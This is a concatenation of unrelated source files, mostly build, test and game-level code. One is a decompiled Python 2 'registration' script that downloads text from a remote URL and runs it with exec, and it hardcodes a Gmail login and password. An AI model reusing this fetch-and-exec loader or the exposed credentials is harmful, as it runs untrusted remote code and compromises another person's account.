version_output = subprocess.check_output(['java', '-version'], stderr=subprocess.STDOUT)
match = bool(re.compile('version "%s' % EXPECTED_VERSION).search(version_output))
message = "JUnit tests need to be run with Java %s. Check the `java -version` on your PATH." % EXPECTED_VERSION
assert match, message
def AssertExpectedXcodeVersion():
"""Checks that the user has a recent version of Xcode installed"""
EXPECTED_MAJOR_VERSION = ['11', '12']
version_output = subprocess.check_output(['xcodebuild', '-version'])
  match = re.match(r"Xcode (\d+)", version_output)
message = "Xcode must be installed to run the iOS embedding unit tests"
assert match.group(1) in EXPECTED_MAJOR_VERSION, message
def RunJavaTests(filter, android_variant='android_debug_unopt'):
"""Runs the Java JUnit unit tests for the Android embedding"""
AssertExpectedJavaVersion()
android_out_dir = os.path.join(out_dir, android_variant)
EnsureJavaTestsAreBuilt(android_out_dir)
embedding_deps_dir = os.path.join(buildroot_dir, 'third_party', 'android_embedding_dependencies', 'lib')
classpath = map(str, [
os.path.join(buildroot_dir, 'third_party', 'android_tools', 'sdk', 'platforms', 'android-30', 'android.jar'),
os.path.join(embedding_deps_dir, '*'), # Wildcard for all jars in the directory
os.path.join(android_out_dir, 'flutter.jar'),
os.path.join(android_out_dir, 'robolectric_tests.jar')
])
test_class = filter if filter else 'io.flutter.FlutterTestSuite'
command = [
'java',
'-Drobolectric.offline=true',
'-Drobolectric.dependency.dir=' + embedding_deps_dir,
'-classpath', ':'.join(classpath),
'-Drobolectric.logging=stdout',
'org.junit.runner.JUnitCore',
test_class
]
RunCmd(command)
def RunObjcTests(ios_variant='ios_debug_sim_unopt'):
"""Runs Objective-C XCTest unit tests for the iOS embedding"""
AssertExpectedXcodeVersion()
ios_out_dir = os.path.join(out_dir, ios_variant)
EnsureIosTestsAreBuilt(ios_out_dir)
ios_unit_test_dir = os.path.join(buildroot_dir, 'flutter', 'testing', 'ios', 'IosUnitTests')
# Avoid using xcpretty unless the following can be addressed:
# - Make sure all relevant failure output is printed on a failure.
# - Make sure that a failing exit code is set for CI.
# See https://github.com/flutter/flutter/issues/63742
command = [
'xcodebuild '
'-sdk iphonesimulator '
'-scheme IosUnitTests '
"-destination platform='iOS Simulator,name=iPhone 8' "
'test '
'FLUTTER_ENGINE=' + ios_variant
]
RunCmd(command, cwd=ios_unit_test_dir, shell=True)
def RunDartTests(build_dir, filter, verbose_dart_snapshot):
# This one is a bit messy. The pubspec.yaml at flutter/testing/dart/pubspec.yaml
# has dependencies that are hardcoded to point to the sky packages at host_debug_unopt/
# Before running Dart tests, make sure to run just that target (NOT the whole engine)
EnsureDebugUnoptSkyPackagesAreBuilt()
# Now that we have the Sky packages at the hardcoded location, run `pub get`.
RunEngineExecutable(build_dir, os.path.join('dart-sdk', 'bin', 'pub'), None, flags=['get'], cwd=dart_tests_dir)
dart_observatory_tests = glob.glob('%s/observatory/*_test.dart' % dart_tests_dir)
dart_tests = glob.glob('%s/*_test.dart' % dart_tests_dir)
if 'release' not in build_dir:
for dart_test_file in dart_observatory_tests:
if filter is not None and os.path.basename(dart_test_file) not in filter:
print("Skipping %s due to filter." % dart_test_file)
else:
print("Testing dart file %s with observatory enabled" % dart_test_file)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, True, True)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, False, True)
for dart_test_file in dart_tests:
if filter is not None and os.path.basename(dart_test_file) not in filter:
print("Skipping %s due to filter." % dart_test_file)
else:
print("Testing dart file %s" % dart_test_file)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, True)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, False)
def RunFrontEndServerTests(build_dir):
test_dir = os.path.join(buildroot_dir, 'flutter', 'flutter_frontend_server')
dart_tests = glob.glob('%s/test/*_test.dart' % test_dir)
for dart_test_file in dart_tests:
opts = [
dart_test_file,
os.path.join(build_dir, 'gen', 'frontend_server.dart.snapshot'),
os.path.join(build_dir, 'flutter_patched_sdk')]
RunEngineExecutable(
build_dir,
os.path.join('dart-sdk', 'bin', 'dart'),
None,
flags=opts,
cwd=test_dir)
def RunConstFinderTests(build_dir):
test_dir = os.path.join(buildroot_dir, 'flutter', 'tools', 'const_finder', 'test')
opts = [
os.path.join(test_dir, 'const_finder_test.dart'),
os.path.join(build_dir, 'gen', 'frontend_server.dart.snapshot'),
os.path.join(build_dir, 'flutter_patched_sdk')]
RunEngineExecutable(build_dir, os.path.join('dart-sdk', 'bin', 'dart'), None, flags=opts, cwd=test_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--variant', dest='variant', action='store',
default='host_debug_unopt', help='The engine build variant to run the tests for.')
parser.add_argument('--type', type=str, default='all')
parser.add_argument('--engine-filter', type=str, default='',
help='A list of engine test executables to run.')
parser.add_argument('--dart-filter', type=str, default='',
help='A list of Dart test scripts to run.')
parser.add_argument('--java-filter', type=str, default='',
help='A single Java test class to run.')
parser.add_argument('--android-variant', dest='android_variant', action='store',
default='android_debug_unopt',
help='The engine build variant to run java tests for')
parser.add_argument('--ios-variant', dest='ios_variant', action='store',
default='ios_debug_sim_unopt',
help='The engine build variant to run objective-c tests for')
parser.add_argument('--verbose-dart-snapshot', dest='verbose_dart_snapshot', action='store_true',
default=False, help='Show extra dart snapshot logging.')
args = parser.parse_args()
if args.type == 'all':
types = ['engine', 'dart', 'benchmarks', 'java', 'objc', 'font-subset']
else:
types = args.type.split(',')
build_dir = os.path.join(out_dir, args.variant)
if args.type != 'java':
assert os.path.exists(build_dir), 'Build variant directory %s does not exist!' % build_dir
engine_filter = args.engine_filter.split(',') if args.engine_filter else None
if 'engine' in types:
RunCCTests(build_dir, engine_filter)
if 'dart' in types:
assert not IsWindows(), "Dart tests can't be run on windows. https://github.com/flutter/flutter/issues/36301."
dart_filter = args.dart_filter.split(',') if args.dart_filter else None
RunDartTests(build_dir, dart_filter, args.verbose_dart_snapshot)
RunConstFinderTests(build_dir)
RunFrontEndServerTests(build_dir)
if 'java' in types:
assert not IsWindows(), "Android engine files can't be compiled on Windows."
java_filter = args.java_filter
if ',' in java_filter or '*' in java_filter:
print('Can only filter JUnit4 tests by single entire class name, eg "io.flutter.SmokeTest". Ignoring filter=' + java_filter)
java_filter = None
RunJavaTests(java_filter, args.android_variant)
if 'objc' in types:
assert IsMac(), "iOS embedding tests can only be run on macOS."
RunObjcTests(args.ios_variant)
# https://github.com/flutter/flutter/issues/36300
if 'benchmarks' in types and not IsWindows():
RunEngineBenchmarks(build_dir, engine_filter)
if ('engine' in types or 'font-subset' in types) and args.variant != 'host_release':
RunCmd(['python', 'test.py'], cwd=font_subset_dir)
if __name__ == '__main__':
sys.exit(main())
| 36.323917 | 131 | 0.724907 |
4a2117465534f5cb436f3fb0eae22a97e208f5a5 | 719 | py | Python | taproom/tests/test_systems.py | slochower/host-guest-benchmarks | c398b499fe6dbae39523278946c0e25eb78d6d66 | [
"MIT"
] | null | null | null | taproom/tests/test_systems.py | slochower/host-guest-benchmarks | c398b499fe6dbae39523278946c0e25eb78d6d66 | [
"MIT"
] | 8 | 2019-07-05T17:55:27.000Z | 2022-03-21T18:59:50.000Z | taproom/tests/test_systems.py | slochower/host-guest-benchmarks | c398b499fe6dbae39523278946c0e25eb78d6d66 | [
"MIT"
] | 1 | 2020-05-05T22:51:21.000Z | 2020-05-05T22:51:21.000Z | """
Tests whether `taproom` can find hosts.
"""
import logging
from taproom.entry_points import find_host_guest_pairs
logger = logging.getLogger(__name__)
def test_bcd():
""" Test that we can find two host YAML instructions for β-cyclodextrin. """
host_guest_systems, host_guest_measurements = find_host_guest_pairs()
assert len(host_guest_systems["bcd"]["yaml"]) == 2
assert host_guest_systems["bcd"]["yaml"][0].name == "host-s.yaml"
assert host_guest_systems["bcd"]["yaml"][1].name == "host-p.yaml"
def test_acd_bam_measurements():
host_guest_systems, host_guest_measurements = find_host_guest_pairs()
assert host_guest_measurements["acd"]["bam"]["yaml"].name == "measurement.yaml"
| 31.26087 | 83 | 0.731572 |
4a21175ed7f9abbbd2585a367203eea2b6ff75ac | 1,380 | py | Python | google/maps/roads/v1op/roads-v1op-py/google/maps/roads/__init__.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/maps/roads/v1op/roads-v1op-py/google/maps/roads/__init__.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/maps/roads/v1op/roads-v1op-py/google/maps/roads/__init__.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.maps.roads_v1.services.roads_service.client import RoadsServiceClient
from google.maps.roads_v1.services.roads_service.async_client import RoadsServiceAsyncClient
from google.maps.roads_v1.types.roads import ListNearestRoadsRequest
from google.maps.roads_v1.types.roads import ListNearestRoadsResponse
from google.maps.roads_v1.types.roads import SnappedPoint
from google.maps.roads_v1.types.roads import SnapToRoadsRequest
from google.maps.roads_v1.types.roads import SnapToRoadsResponse
from google.maps.roads_v1.types.roads import TravelMode
__all__ = ('RoadsServiceClient',
'RoadsServiceAsyncClient',
'ListNearestRoadsRequest',
'ListNearestRoadsResponse',
'SnappedPoint',
'SnapToRoadsRequest',
'SnapToRoadsResponse',
'TravelMode',
)
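
# A minimal usage sketch (illustrative only: the request field values are
# assumptions, and the client is assumed to pick up Application Default
# Credentials from the environment):
#
#     from google.maps import roads
#
#     client = roads.RoadsServiceClient()
#     request = roads.SnapToRoadsRequest(
#         path="60.170880,24.942795|60.170879,24.942796",
#         interpolate=True,
#     )
#     response = client.snap_to_roads(request=request)
#     for point in response.snapped_points:
#         print(point.location)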
| 38.333333 | 92 | 0.792029 |
4a2117f31fda35567b3777349767971103ed3634 | 723 | py | Python | setup.py | Marvin-Be/OkapiPythonConnector | 3accd89b974e13de74f065b17c88e764dc9b9ba6 | [
"MIT"
] | null | null | null | setup.py | Marvin-Be/OkapiPythonConnector | 3accd89b974e13de74f065b17c88e764dc9b9ba6 | [
"MIT"
] | null | null | null | setup.py | Marvin-Be/OkapiPythonConnector | 3accd89b974e13de74f065b17c88e764dc9b9ba6 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="okapi-python-connector",
version="2020-12",
author="Jonas Radtke",
author_email="[email protected]",
description="Package to connect to OKAPI Api",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/OKAPIOrbits/OkapiPythonConnector",
packages=setuptools.find_packages(),
install_requires=[
'requests'
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 28.92 | 63 | 0.64592 |
4a21183e4d7939ab15bbda3eb7bc5ad68bd641ba | 2,168 | py | Python | crypto/crypto_dec.py | Alpha-Demon404/RE-14 | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 39 | 2020-02-26T09:44:36.000Z | 2022-03-23T00:18:25.000Z | crypto/crypto_dec.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 15 | 2020-05-14T10:07:26.000Z | 2022-01-06T02:55:32.000Z | crypto/crypto_dec.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | # uncompyle6 version 3.5.0
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <JustAHacker>
# Source code from crazy tools sTamdatez
import smtplib, os, sys, base64, random, time, requests
try:
file = '/data/data/com.termux/files/usr/etc/justahackers.log'
fileopen = open(file).read()
a = base64.b64decode(fileopen)
time.sleep(1)
    print '\x1b[1;32mWelcome \x1b[1;33m' + a
lnk = requests.get('https://justaserverscript.000webhostapp.com/crypto.txt').text
time.sleep(3)
exec lnk
except IOError:
time.sleep(3)
    print '\x1b[1;36mSorry, you have not registered the JustAHacker script yet. Please register first '
    kode = random.randint(232658, 947364)
    fadd = '[email protected]'
    namalu = raw_input('Your name : ')
    tadd = raw_input('Enter your Gmail : ')
    print 'A 6-digit verification code has been sent to ' + str(tadd)
    SUBJECT = 'JustAHackers Script Verification Code '
    TEXT = 'Your JustAHackers script verification code is ' + str(kode) + '\n\n\nSubscribe JustA Hacker'
message = ('Subject: {}\n\n{}').format(SUBJECT, TEXT)
username = '[email protected]'
password = 'ohiabuebmpoeomqk'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(username, password)
server.sendmail(fadd, tadd, message)
os.system('am start com.google.android.gm')
def verif():
os.system('clear')
    print '\x1b[1;35mEnter the code that was sent to ' + str(tadd)
    print ''
    kodev = raw_input('\x1b[1;33mCode = ')
    if kodev == str(kode):
        print 'Verification successful... '
        time.sleep(2)
        regis()
    else:
        print 'The code you entered is wrong. Please check your Gmail for the code.'
time.sleep(3)
verif()
def regis():
namalub = base64.b64encode(namalu)
d = open('/data/data/com.termux/files/usr/etc/justahackers.log', 'w')
d.write(namalub)
d.close()
os.system('python2 crypto.py')
if __name__ == '__main__':
verif()
| 34.967742 | 106 | 0.66559 |
4a2118aac528498c4d9ada573469c2e87cb512c5 | 926 | py | Python | oscar/templatetags/display_tags.py | endgame/django-oscar | e5d78436e20b55902537a6cc82edf4e22568f9d6 | [
"BSD-3-Clause"
] | null | null | null | oscar/templatetags/display_tags.py | endgame/django-oscar | e5d78436e20b55902537a6cc82edf4e22568f9d6 | [
"BSD-3-Clause"
] | null | null | null | oscar/templatetags/display_tags.py | endgame/django-oscar | e5d78436e20b55902537a6cc82edf4e22568f9d6 | [
"BSD-3-Clause"
] | 1 | 2019-07-10T06:32:14.000Z | 2019-07-10T06:32:14.000Z | from django import template
register = template.Library()
def get_parameters(parser, token):
"""
{% get_parameters except_field %}
"""
args = token.split_contents()
if len(args) < 2:
raise template.TemplateSyntaxError(
"get_parameters tag takes at least 1 argument")
return GetParametersNode(args[1].strip())
class GetParametersNode(template.Node):
"""
Renders current get parameters except for the specified parameter
"""
def __init__(self, field):
self.field = field
def render(self, context):
request = context['request']
getvars = request.GET.copy()
if self.field in getvars:
del getvars[self.field]
        if getvars:
get_params = "%s&" % getvars.urlencode()
else:
get_params = ''
return get_params
get_parameters = register.tag(get_parameters)
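
# A minimal template usage sketch (assumes the 'request' variable is exposed
# in the template context via a request context processor):
#
#     {% load display_tags %}
#     <a href="?{% get_parameters page %}page=2">Next</a>
#
# This re-emits the current query string minus the "page" parameter, so the
# link preserves any active filters while changing pages.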
| 23.15 | 69 | 0.62203 |
4a2118b9eaef9162430254fe0426ab7f1255aad5 | 13,454 | py | Python | toontown/coghq/LawbotOfficeBoilerRoom_Trap00.py | CrankySupertoon01/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2021-02-13T22:40:50.000Z | 2021-02-13T22:40:50.000Z | toontown/coghq/LawbotOfficeBoilerRoom_Trap00.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2018-07-28T20:07:04.000Z | 2018-07-30T18:28:34.000Z | toontown/coghq/LawbotOfficeBoilerRoom_Trap00.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 2 | 2019-12-02T01:39:10.000Z | 2021-02-13T22:41:00.000Z | from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_10/models/cashbotHQ/ZONE08a',
'wantDoors': 1},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
10055: {'type': 'attribModifier',
'name': '<unnamed>',
'comment': '',
'parentEntId': 10001,
'attribName': 'modelPath',
'recursive': 1,
'typeName': 'model',
'value': ''},
100023: {'type': 'goon',
'name': '<unnamed>',
'comment': '',
'parentEntId': 100022,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 3.5,
'attackRadius': 6.0,
'crushCellId': None,
'goonType': 'sg',
'gridId': None,
'hFov': 90.0,
'strength': 15,
'velocity': 4},
100000: {'type': 'model',
'name': 'wall',
'comment': '',
'parentEntId': 100004,
'pos': Point3(51.4205, -2.29817, 0),
'hpr': Vec3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100002: {'type': 'model',
'name': 'copy of wall',
'comment': '',
'parentEntId': 100004,
'pos': Point3(36.415, -2.3, 0),
'hpr': Vec3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100005: {'type': 'model',
'name': 'copy of wall (2)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(23.2853, -0.371783, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100006: {'type': 'model',
'name': 'copy of wall (3)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(23.2853, -15.2326, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100007: {'type': 'model',
'name': 'copy of wall (4)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(23.2853, -30.3458, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100008: {'type': 'model',
'name': 'copy of wall (5)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(8.38448, 29.6127, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100009: {'type': 'model',
'name': 'copy of wall (6)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(8.38448, 14.8894, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100010: {'type': 'model',
'name': 'copy of wall (7)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(8.38448, -0.135276, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100011: {'type': 'model',
'name': 'copy of wall (8)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-8.54444, 0.0828297, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100012: {'type': 'model',
'name': 'copy of wall (9)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-23.6854, 0.0828297, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100013: {'type': 'model',
'name': 'copy of wall (10)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -45.2411, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100014: {'type': 'model',
'name': 'copy of wall (11)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -30.557, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100015: {'type': 'model',
'name': 'copy of wall (12)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -15.612, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100016: {'type': 'model',
'name': 'copy of wall (13)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -0.453893, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100017: {'type': 'model',
'name': 'copy of wall (14)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, 14.6685, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100018: {'type': 'model',
'name': 'copy of wall (15)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, 14.6685, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100019: {'type': 'model',
'name': 'copy of wall (16)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-21.5858, 14.6685, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
10001: {'type': 'nodepath',
'name': 'crates',
'comment': '',
'parentEntId': 10028,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1.3, 1.3, 1.64892)},
10002: {'type': 'nodepath',
'name': 'rewardBarrels',
'comment': '',
'parentEntId': 0,
'pos': Point3(-0.719734, 56.9691, 10.0021),
'hpr': Vec3(61.6992, 0, 0),
'scale': Vec3(1, 1, 1)},
10003: {'type': 'nodepath',
'name': 'upperWall',
'comment': 'TODO: replace with lines of shelves',
'parentEntId': 0,
'pos': Point3(-20.3203, 52.6549, 9.90873),
'hpr': Vec3(270, 0, 0),
'scale': Vec3(1.1143, 1.1143, 1.1143)},
10009: {'type': 'nodepath',
'name': 'toGear0',
'comment': '',
'parentEntId': 10001,
'pos': Point3(-26.5593, 31.856, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
10011: {'type': 'nodepath',
'name': 'toGear1',
'comment': '',
'parentEntId': 10001,
'pos': Point3(-25.884, 13.6749, 0),
'hpr': Vec3(41.6335, 0, 0),
'scale': Vec3(1, 1, 1)},
10023: {'type': 'nodepath',
'name': 'leftWall',
'comment': '',
'parentEntId': 10003,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10024: {'type': 'nodepath',
'name': 'rightWall',
'comment': '',
'parentEntId': 10003,
'pos': Point3(-26.7112, 6.85982, 0),
'hpr': Point3(180, 0, 0),
'scale': Vec3(1, 1, 1)},
10028: {'type': 'nodepath',
'name': 'lowerPuzzle',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0.05),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10029: {'type': 'nodepath',
'name': 'entranceWall',
'comment': '',
'parentEntId': 10001,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10032: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10038: {'type': 'nodepath',
'name': 'archStompers',
'comment': '',
'parentEntId': 10028,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10040: {'type': 'nodepath',
'name': 'backWall',
'comment': '',
'parentEntId': 10001,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10044: {'type': 'nodepath',
'name': 'gear',
'comment': '',
'parentEntId': 10028,
'pos': Point3(11.85, -11.38, 12.528),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
10046: {'type': 'nodepath',
'name': 'supportedCrateBackWall',
'comment': '',
'parentEntId': 10028,
'pos': Point3(34.9045, -34.0589, -1.51687),
'hpr': Vec3(63.4349, 0, 0),
'scale': Vec3(1, 1, 1)},
10051: {'type': 'nodepath',
'name': 'supportedCrateEntrance',
'comment': '',
'parentEntId': 10028,
'pos': Point3(48.5077, 7.75915, 0.357897),
'hpr': Point3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
10059: {'type': 'nodepath',
'name': 'largeStack',
'comment': '',
'parentEntId': 10029,
'pos': Point3(47.98, -16.98, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10061: {'type': 'nodepath',
'name': 'lower',
'comment': '',
'parentEntId': 10059,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100001: {'type': 'nodepath',
'name': 'trap1 cog node',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100004: {'type': 'nodepath',
'name': 'maze',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100021: {'type': 'nodepath',
'name': 'Goon Parent',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100003: {'type': 'path',
'name': 'test goon path',
'comment': '',
'parentEntId': 0,
'pos': Point3(-50.4808, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'pathIndex': 0,
'pathScale': 1.0},
100020: {'type': 'path',
'name': 'GoonPath1',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'pathIndex': 0,
'pathScale': 1.0},
100022: {'type': 'path',
'name': 'GoonPath1',
'comment': '',
'parentEntId': 100021,
'pos': Point3(-10, -30, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'pathIndex': 0,
'pathScale': 2.0}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
| 33.974747 | 69 | 0.460384 |
4a2118cbaf33a53dd0464a1f29973a264b29d7c3 | 729 | py | Python | phoenix_tempmail/Mailbox.py | painphoenix/binbox | d0e638f82cd13661e5bb51f9d498c434ab3b78d4 | [
"MIT"
] | 24 | 2021-09-30T07:17:38.000Z | 2022-03-23T07:57:21.000Z | phoenix_tempmail/Mailbox.py | painphoenix/binbox | d0e638f82cd13661e5bb51f9d498c434ab3b78d4 | [
"MIT"
] | 3 | 2021-10-20T14:32:30.000Z | 2022-02-01T17:09:45.000Z | phoenix_tempmail/Mailbox.py | painphoenix/binbox | d0e638f82cd13661e5bb51f9d498c434ab3b78d4 | [
"MIT"
] | 5 | 2021-10-01T07:01:58.000Z | 2022-03-28T12:39:58.000Z | import os
import email
class Email:
def __init__(self):
self.from_email = ""
self.date = ""
self.subject = ""
self.to = ""
self.content = ""
class Mail:
@staticmethod
def formate_email(data):
formated_email = Email()
msg = email.message_from_string(data)
formated_email.from_email = msg['from']
formated_email.date = msg["date"]
formated_email.subject = msg["subject"]
formated_email.to = msg["to"]
for payload in msg.get_payload():
charset_type = str(payload.get_content_charset())
formated_email.content += payload.get_payload(decode=True).decode(charset_type)
return formated_email
| 27 | 91 | 0.613169 |
4a21192d94ff9d0ed3012a6ea6d0b5a7af3dfbb9 | 10,047 | py | Python | pretraining/xlnet_premodel.py | drr3d/id-pytorch-transformers | 504bdd3c47eb6a2206ef9be3118cd0367bf3526d | [
"Apache-2.0"
